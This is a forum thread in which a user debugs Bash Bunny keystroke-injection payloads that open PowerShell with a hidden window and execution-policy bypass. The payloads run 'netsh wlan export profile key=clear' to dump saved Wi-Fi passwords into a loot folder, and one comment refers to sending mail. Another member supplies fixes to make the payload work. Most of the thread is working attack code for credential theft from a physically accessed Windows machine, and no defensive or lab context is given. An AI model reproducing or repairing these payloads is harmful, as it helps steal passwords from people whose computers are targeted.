Kristoxx Posted October 9, 2023 Share Posted October 9, 2023 I have following script ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE ######## ATTACK ######## LED ATTACK DELAY 6000 RUN WIN powershell ENTER DELAY 3000 STRING $volume = (Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name; Set-Location -Path "$volume\payloads\switch2" .\payload.ps1 # RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" # Wait until mail are sended. sleep 10 When executing it gets stuck in PowerShell but does not write $volume = .... what could it be? I have tried making its execution slower with delay, but the same result. Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted October 10, 2023 Share Posted October 10, 2023 You need to use QUACK on the Bunny Quote Link to comment Share on other sites More sharing options...
suricato Posted October 13, 2023 Share Posted October 13, 2023 Sorry that I changed accounts, I changed the code using QUACK in STRING but in the same way the execution of BB stops on the previous line Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted October 13, 2023 Share Posted October 13, 2023 Post the full payload code here in its latest version Quote Link to comment Share on other sites More sharing options...
Kristoxx Posted October 14, 2023 Author Share Posted October 14, 2023 DUCKY_LANG es-la GET SWITCH_POSITION ATTACKMODE HID STORAGE # Create directory under loot to store passwords in mkdir -p /root/udisk/loot/WiPassDump LED R 200 DELAY 6000 # Open windows run console Q GUI r Q DELAY 1000 # enter payload and execute Q STRING notepad ENTER DELAY 1000 Q STRING hola DELAY 1000 Q STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name Q STRING Set-Location -Path "$volume\loot\WiPassDump" Q STRING netsh wlan export profile key=clear ENTER #Let code run, then sync DELAY 5000 sync # Wait for misc. to happen on computer DELAY 1000 # Done! LED G Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted October 14, 2023 Share Posted October 14, 2023 You need to QUACK the DELAY lines as well as ENTER Also, I'd suggest using QUACK instead of Q. Q is the same as QUACK, but I (and others) have experienced strange behavior using Q. I haven't been digging any deeper into that as to why that might be the case, but I always use QUACK instead of Q. There are other things in that payload that will need adjustment, but you will find that out. Quote Link to comment Share on other sites More sharing options...
Kristoxx Posted October 14, 2023 Author Share Posted October 14, 2023 I have followed your instructions and corrected the code but still it only runs powershell and then it does not write anything, the light remains red DUCKY_LANG es-la GET SWITCH_POSITION ATTACKMODE HID STORAGE # Create directory under loot to store passwords in mkdir -p /root/udisk/loot/WiPassDump LED R 200 QUACK DELAY 6000 # Open windows run console QUACK GUI r QUACK DELAY 1000 # enter payload and execute QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 QUACK STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name QUACK STRING Set-Location -Path "$volume\loot\WiPassDump" QUACK STRING netsh wlan export profile key=clear QUACK ENTER #Let code run, then sync QUACK DELAY 5000 sync # Wait for misc. to happen on computer QUACK DELAY 1000 # Done! LED G I think the problem is on the line QUACK STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name QUACK STRING Set-Location -Path "$volume\loot\WiPassDump" QUACK STRING netsh wlan export profile key=clear QUACK ENTER I also wanted to thank you for the help, greetings Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted October 14, 2023 Share Posted October 14, 2023 You probably need to escape the $ char and/or quote the whole line Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.